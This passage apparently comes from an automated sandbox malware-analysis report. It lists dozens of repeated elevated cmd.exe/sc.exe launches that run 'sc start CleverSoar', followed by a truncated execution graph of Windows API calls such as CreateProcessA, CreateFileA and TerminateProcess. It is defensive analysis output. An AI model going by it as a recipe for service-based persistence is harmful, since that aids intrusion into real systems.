                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:60
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:67
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:68
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:69
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:70
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:71
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:72
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:73
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:74
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:75
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:76
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:77
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:78
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:79
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:80
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:81
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:82
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:83
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:84
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:85
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:86
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:87
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:88
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:89
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:90
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:91
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:92
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:93
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:94
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:95
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:96
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:97
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:98
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:99
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:100
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:101
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:102
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:103
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:104
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:105
                                      Start time:03:10:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:106
                                      Start time:03:11:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                        Execution Graph

                                        Execution Coverage:1.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:15.3%
                                        Total number of Nodes:790
                                        Total number of Limit Nodes:13
                                        execution_graph 100308 6bf54a27 100309 6bf54a5d _strlen 100308->100309 100310 6bf6639e 100309->100310 100311 6bf55b6f 100309->100311 100312 6bf55b58 100309->100312 100316 6bf55b09 _Yarn 100309->100316 100438 6c0d0130 18 API calls 2 library calls 100310->100438 100315 6c0c6a43 std::_Facet_Register 4 API calls 100311->100315 100424 6c0c6a43 100312->100424 100315->100316 100399 6c0baec0 100316->100399 100319 6bf55bad std::ios_base::_Ios_base_dtor 100319->100310 100322 6bf59ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100319->100322 100403 6c0c4ff0 CreateProcessA 100319->100403 100320 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100320->100322 100321 6c0baec0 FindFirstFileA 100321->100322 100322->100310 100322->100320 100322->100321 100323 6bf5a292 Sleep 100322->100323 100341 6bf5e619 100322->100341 100398 6bf59bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100323->100398 100324 6bf56624 100327 6c0c6a43 std::_Facet_Register 4 API calls 100324->100327 100325 6bf5660d 100326 6c0c6a43 std::_Facet_Register 4 API calls 100325->100326 100333 6bf565bc _Yarn _strlen 100326->100333 100327->100333 100328 6bf561cb _strlen 100328->100310 100328->100324 100328->100325 100328->100333 100329 6bf59bbd GetCurrentProcess TerminateProcess 100329->100322 100330 6bf663b2 100439 6bf415e0 18 API calls std::ios_base::_Ios_base_dtor 100330->100439 100332 6bf664f8 100333->100330 100334 6bf56970 100333->100334 100335 6bf56989 100333->100335 100338 6bf56920 _Yarn 100333->100338 100336 6c0c6a43 std::_Facet_Register 4 API calls 100334->100336 100337 6c0c6a43 std::_Facet_Register 4 API calls 100335->100337 100336->100338 100337->100338 100407 6c0c5960 100338->100407 100340 6bf5f243 CreateFileA 100356 6bf5f2a7 100340->100356 100341->100340 100342 6bf569d6 std::ios_base::_Ios_base_dtor _strlen 100342->100310 100343 6bf56dd2 100342->100343 100344 6bf56dbb 100342->100344 100357 6bf56d69 _Yarn 
_strlen 100342->100357 100345 6c0c6a43 std::_Facet_Register 4 API calls 100343->100345 100347 6c0c6a43 std::_Facet_Register 4 API calls 100344->100347 100345->100357 100346 6bf602ca 100347->100357 100348 6c0c5960 104 API calls 100348->100398 100349 6bf57427 100351 6c0c6a43 std::_Facet_Register 4 API calls 100349->100351 100350 6bf57440 100352 6c0c6a43 std::_Facet_Register 4 API calls 100350->100352 100353 6bf573da _Yarn 100351->100353 100352->100353 100354 6c0c5960 104 API calls 100353->100354 100358 6bf5748d std::ios_base::_Ios_base_dtor _strlen 100354->100358 100355 6bf602ac GetCurrentProcess TerminateProcess 100355->100346 100356->100346 100356->100355 100357->100330 100357->100349 100357->100350 100357->100353 100358->100310 100359 6bf57991 100358->100359 100360 6bf579a8 100358->100360 100363 6bf57940 _Yarn _strlen 100358->100363 100361 6c0c6a43 std::_Facet_Register 4 API calls 100359->100361 100362 6c0c6a43 std::_Facet_Register 4 API calls 100360->100362 100361->100363 100362->100363 100363->100330 100364 6bf57de2 100363->100364 100365 6bf57dc9 100363->100365 100368 6bf57d7c _Yarn 100363->100368 100367 6c0c6a43 std::_Facet_Register 4 API calls 100364->100367 100366 6c0c6a43 std::_Facet_Register 4 API calls 100365->100366 100366->100368 100367->100368 100369 6c0c5960 104 API calls 100368->100369 100370 6bf57e2f std::ios_base::_Ios_base_dtor _strlen 100369->100370 100370->100310 100371 6bf585bf 100370->100371 100372 6bf585a8 100370->100372 100379 6bf58556 _Yarn _strlen 100370->100379 100374 6c0c6a43 std::_Facet_Register 4 API calls 100371->100374 100373 6c0c6a43 std::_Facet_Register 4 API calls 100372->100373 100373->100379 100374->100379 100375 6bf58983 100378 6c0c6a43 std::_Facet_Register 4 API calls 100375->100378 100376 6bf5896a 100377 6c0c6a43 std::_Facet_Register 4 API calls 100376->100377 100380 6bf5891d _Yarn 100377->100380 100378->100380 100379->100330 100379->100375 100379->100376 100379->100380 100381 6c0c5960 104 API calls 100380->100381 100384 
